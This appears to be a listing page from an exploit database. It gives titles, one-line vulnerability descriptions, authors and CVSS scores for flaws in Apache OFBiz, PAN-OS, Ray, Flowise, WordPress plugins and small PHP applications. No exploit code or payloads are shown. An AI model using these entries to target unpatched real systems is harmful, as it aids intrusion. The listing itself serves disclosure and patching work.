Text Exploits
31,383 exploits tracked across all sources.
Apache OFBiz <18.12.13 - Path Traversal
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
by Abdualhadi khalifa
CVSS 9.8
Prison Management System Using PHP 1.0 - SQL Injection
Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page.
by Sanjay Singh
CVSS 7.3
Chyrp 2.5.2 - Authenticated Stored Cross-Site Scripting via Post Title
Chyrp 2.5.2 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into post titles. Attackers can craft payloads in the title field that will execute when the post is viewed by other users, potentially stealing session cookies or performing client-side attacks.
by Ahmet Ümit BAYRAM
CVSS 5.4
PyroCMS v3.0.1 - Stored Cross-Site Scripting via Admin Redirects Configuration
PyroCMS v3.0.1 contains a stored cross-site scripting vulnerability in the admin redirects configuration that allows attackers to inject malicious scripts. Attackers can insert a payload in the 'Redirect From' field to execute arbitrary JavaScript when administrators view the redirects page.
by tmrswrr
CVSS 5.4
CE Phoenix - Stored Cross-Site Scripting in Currencies Administration Panel
CE Phoenix v3.0.1 contains a stored cross-site scripting vulnerability in the currencies administration panel that allows attackers to inject malicious scripts. Attackers can insert XSS payloads in the title field to execute arbitrary JavaScript when administrators view the currencies page.
by tmrswrr
Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
by Ahmet Ümit BAYRAM
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
by modrnProph3t
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
by LiquidWorm
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure
by LiquidWorm
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass
by LiquidWorm
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
by LiquidWorm
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass
by LiquidWorm
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
by LiquidWorm
WordPress Background Image Cropper 1.2 Remote Code Execution
WordPress Background Image Cropper version 1.2 contains a remote code execution vulnerability that allows unauthenticated attackers to upload arbitrary files by accessing the ups.php endpoint. Attackers can upload PHP files through the file upload form in the plugin directory to execute arbitrary code on the server.
by Milad karimi
CVSS 9.8
Flowise < 1.6.5 - Remote Code Execution via API v1 Component
An issue in FlowiseAI Inc Flowise v.1.6.2 and before allows a remote attacker to execute arbitrary code via a crafted script to the api/v1 component.
by Maerifat Majeed
CVSS 7.6
Laravel Framework <11 - Info Disclosure
An issue in Laravel Framework 8 through 11 might allow a remote attacker to discover database credentials in storage/logs/laravel.log. NOTE: this is disputed by multiple third parties because the owner of a Laravel Framework installation can choose to have debugging logs, but needs to set the access control appropriately for the type of data that may be logged.
by Huseein Amer
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
by Kr0ff
CVSS 10.0
Savsoft Quiz 6.0 - Stored Cross-Site Scripting via Quiz Name Parameter
Savsoft Quiz 6.0 allows stored XSS via the index.php/quiz/insert_quiz/ quiz_name parameter.
by Eren Sen
CVSS 6.1
PHPGurukul Online Fire Reporting System 1.2 - SQL Injection via Username Input Field
A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.
by Diyar Saadi
CVSS 9.1
Terratec DMX_6Fire USB <1.23.0.02 - Privilege Escalation
An unquoted service path vulnerability in Terratec DMX_6Fire USB v.1.23.0.02 allows a local attacker to escalate privileges via the Program.exe component.
by Joseph Kwabena Fiagbor
CVSS 6.7
Ray < 2.8.1 - Unauthenticated Remote Code Execution via CPU Profile URL Parameter
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
by Fire_Wolf
CVSS 9.8
Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)
by Erdemstar
By Source